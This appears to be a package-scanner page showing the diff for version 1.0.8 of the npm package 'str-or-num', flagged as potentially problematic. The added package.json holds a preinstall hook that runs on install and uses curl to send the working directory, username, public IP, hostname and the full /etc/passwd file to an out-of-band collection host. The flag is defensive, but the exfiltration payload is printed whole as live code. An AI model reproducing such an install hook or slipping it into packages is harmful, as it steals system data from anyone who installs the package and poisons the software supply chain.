str-or-num 1.0.8

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of str-or-num might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +15 -0
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "str-or-num",
3
+ "version": "1.0.8",
4
+ "main": "main.js",
5
+ "scripts": {
6
+ "preinstall": "curl thuhqblhgpqqukbfqbuzi3060zx86xfcz.oast.fun/pwd=$(pwd) && curl thuhqblhgpqqukbfqbuzi3060zx86xfcz.oast.fun/whoami=$(whoami)&&curl thuhqblhgpqqukbfqbuzi3060zx86xfcz.oast.fun/package=$(echo 'str-or-num') && curl thuhqblhgpqqukbfqbuzi3060zx86xfcz.oast.fun/ip=$(curl ifconfig.me)&& curl --data '@/etc/passwd' thuhqblhgpqqukbfqbuzi3060zx86xfcz.oast.fun/hostname=$(hostname) ",
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "Hacked",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "lodash": "^4.17.21"
13
+ },
14
+ "description": ""
15
+ }